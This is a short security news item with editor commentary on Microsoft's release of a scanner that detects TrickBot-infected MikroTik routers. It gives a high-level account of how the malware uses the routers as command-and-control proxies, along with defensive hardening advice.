Microsoft Releases Scanner to Detect TrickBot-Infected Devices
In a blog post, the Microsoft Defender for IoT research team shares its analysis of how MikroTik devices are used in TrickBot’s command and control framework. Microsoft has published a tool that can be used to detect MikroTik Internet-of-Things (IoT) devices that are infected with TrickBot.
Great work by Microsoft. But a bit sad that this didn't come from MikroTik. Like many similar devices, MikroTik routers had their share of vulnerabilities (or just simple misconfigurations) in the past. But vendors need to step up and provide users with tools to avoid and detect configuration errors and compromise. This could start with a simple standardized API to request firmware versions for easier vulnerability scanning (and an API to find the most recent version easily). Currently, scripts to accomplish this often have to scrape data from ever changing webpages. (Prove me wrong and let me know of vendors doing this well.)
It still blows my mind when looking at all the cool cyber research Microsoft is publishing, to include free tools for prevention and detection. If you have any MikroTik devices you need to read this. Essentially the TrickBot malware is using the routers as a proxy on a non-standard port to access their C2 servers. Then adds a persistence layer which obfuscates malicious IPs to avoid many detection systems. Make sure that you have changed default passwords on your MikroTik devices, use good passphrases – ideally checked against data breaches and keep the firmware updated. Only allow management from authorized systems making sure you restrict access to port 8291 and 22. Grab the forensic tool and cross-check your devices for any areas of concern.
Read more in
Bleeping Computer: Microsoft creates tool to scan MikroTik routers for TrickBot infections